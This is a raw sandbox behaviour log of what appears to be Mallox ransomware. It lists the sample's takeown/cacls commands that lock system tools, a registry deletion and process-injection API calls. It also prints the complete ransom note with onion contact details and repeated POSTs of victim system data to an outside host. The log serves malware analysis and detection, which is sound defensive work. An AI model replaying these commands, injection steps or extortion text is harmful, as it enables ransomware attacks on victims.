file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
domain api.ipify.org
file C:\Users\Public\Pictures\Kill-Delete.bat
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
cmdline cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
cmdline takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\system32\cmd.exe /g Administrators:f
cmdline takeown /f C:\Windows\system32\cmd.exe /a
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\cmd.exe /e /g system:r
cmdline takeown /f C:\Windows\SysWOW64\cmd.exe /a
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\cmd.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
cmdline takeown /f C:\Windows\SysWOW64\mshta.exe /a
cmdline cacls C:\Windows\system32\mshta.exe /g Administrators:f
cmdline cacls C:\Windows\system32\mshta.exe /e /d system
cmdline cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\cmd.exe /e /d "network service"
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo y"
cmdline cacls C:\Windows\system32\cmd.exe /e /g Users:r
cmdline cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url https://www.torproject.org/download/
description Match Windows Http API call rule Str_Win32_Http_API
description Escalate priviledges rule Escalate_priviledges
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline cacls C:\Windows\system32\net.exe /e /d system
cmdline cacls C:\Windows\system32\net.exe /e /d "network service"
cmdline cacls C:\Windows\system32\net.exe /e /g Users:r
cmdline cacls C:\Windows\system32\net.exe /g Administrators:f
cmdline cacls C:\Windows\system32\net.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
cmdline cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d system
cmdline cacls C:\Windows\system32\net.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
cmdline reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
cmdline cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
cmdline takeown /f C:\Windows\SysWOW64\net.exe /a
cmdline cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
cmdline takeown /f C:\Windows\system32\net.exe /a
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\net.exe /e /g Administrators:r
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 7492
region_size: 176128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004d8
1 0 0

NtProtectVirtualMemory

 process_identifier: 7492
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 176128
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
process_handle: 0x000004d8
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description rxtygf.exe tried to sleep 5456509 seconds, actually delayed analysis time by 5456509 seconds
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`œ&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄM‰a±&vaÄMt`±&vaRich°&vaPELYOdà |ü§“@°@ȀàÌ@8x@Ð.textôz| `.rdata\”–€@@.dataPK0@À.rsrcà€&@@.reloc̐(@B
base_address: 0x00400000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

 buffer: €0€ H`€}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00428000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 7492
process_handle: 0x000004d8
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`œ&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄM‰a±&vaÄMt`±&vaRich°&vaPELYOdà |ü§“@°@ȀàÌ@8x@Ð.textôz| `.rdata\”–€@@.dataPK0@À.rsrcà€&@@.reloc̐(@B
base_address: 0x00400000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 1680 called NtSetContextThread to modify thread in remote process 7492
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4232103
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004d4
process_identifier: 7492
1 0 0
url https://www.torproject.org/download/
Time & API Arguments Status Return Repeated

NtWriteFile

 buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.
offset: 0
file_handle: 0x00000344
filepath: \Device\HarddiskVolume1\FILE RECOVERY.txt
1 0 0

NtWriteFile

 buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.
offset: 0
file_handle: 0x0000033c
filepath: C:\FILE RECOVERY.txt
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

HttpSendRequestW

 headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0
file C:\Users\test22\AppData\Local\Temp\rxtygf.exe\:Zone.Identifier
Process injection Process 1680 resumed a thread in remote process 7492
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000004d4
suspend_count: 1
process_identifier: 7492
1 0 0
cmdline cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
cmdline cacls C:\Windows\system32\net.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\net.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\net.exe /e /g Users:r
cmdline cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
cmdline cacls C:\Users\Public /e /d "network service"
cmdline cacls C:\Windows\system32\net1.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
cmdline cacls C:\Users\Public /g Administrators:f
cmdline cacls C:\Windows\system32\FTP.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\wscript.exe /e /d system
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\system32\net.exe /g Administrators:f
cmdline cacls C:\ProgramData /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
cmdline cacls C:\Windows\system32\wscript.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
cmdline cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\wscript.exe /e /d "network service"
cmdline cacls C:\Windows\system32\FTP.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\net1.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\net.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
cmdline cacls C:\Users\Public /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
cmdline cacls C:\Users\Public /e /d system
cmdline cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
cmdline cacls C:\Windows\system32\cscript.exe /e /d SERVICE
cmdline cacls C:\ProgramData /e /d system
cmdline cacls C:\Windows\system32\cmd.exe /g Administrators:f
cmdline cacls C:\Windows\system32\FTP.exe /g Administrators:f
cmdline cacls C:\Windows\system32\net1.exe /e /g Users:r
cmdline cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\net1.exe /e /d "network service"
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline cacls C:\Windows\system32\cscript.exe /e /g Users:r
cmdline cacls C:\Users\Public /e /d mssql$sqlexpress
registry HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware VGAuth
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
FireEye Generic.mg.ad607f046a6f855f
McAfee Artemis!AD607F046A6F
Cylance unsafe
Sangfor Trojan.Win32.Agent.Vtuo
Symantec ML.Attribute.HighConfidence
tehtris Generic.Malware
Cynet Malicious (score: 100)
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
Avast TrojanX-gen [Trj]
McAfee-GW-Edition BehavesLike.Win32.Generic.fh
Trapmine malicious.moderate.ml.score
Webroot W32.Trojan.Gen
Microsoft Trojan:Win32/Casdet!rfn
ZoneAlarm UDS:DangerousObject.Multi.Generic
Google Detected
BitDefenderTheta Gen:NN.ZemsilF.36318.ym0@aWl!rFc
Panda Trj/Genetic.gen
Ikarus Trojan-Spy.Keylogger.Snake
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Kryptik.KBT!tr
AVG TrojanX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

 thread_handle: 0x00000198
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

 thread_handle: 0x000003f8
suspend_count: 1
process_identifier: 1680
1 0 0

CreateProcessInternalW

 thread_identifier: 2456
thread_handle: 0x00000480
process_identifier: 2452
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Users\Public\Pictures\Kill-Delete.bat"
filepath_r:
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000004a0
1 1 0

NtResumeThread

 thread_handle: 0x0000044c
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

 thread_handle: 0x000004b4
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

 thread_handle: 0x000003f8
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

 thread_handle: 0x000004c0
suspend_count: 1
process_identifier: 1680
1 0 0

CreateProcessInternalW

 thread_identifier: 7496
thread_handle: 0x000004d4
process_identifier: 7492
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
track: 1
command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000004d8
1 1 0

NtGetContextThread

 thread_handle: 0x000004d4
1 0 0

NtAllocateVirtualMemory

 process_identifier: 7492
region_size: 176128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004d8
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`œ&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄM‰a±&vaÄMt`±&vaRich°&vaPELYOdà |ü§“@°@ȀàÌ@8x@Ð.textôz| `.rdata\”–€@@.dataPK0@À.rsrcà€&@@.reloc̐(@B
base_address: 0x00400000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00419000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00423000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

 buffer: €0€ H`€}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00428000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00429000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

NtSetContextThread

 registers.eip: 0
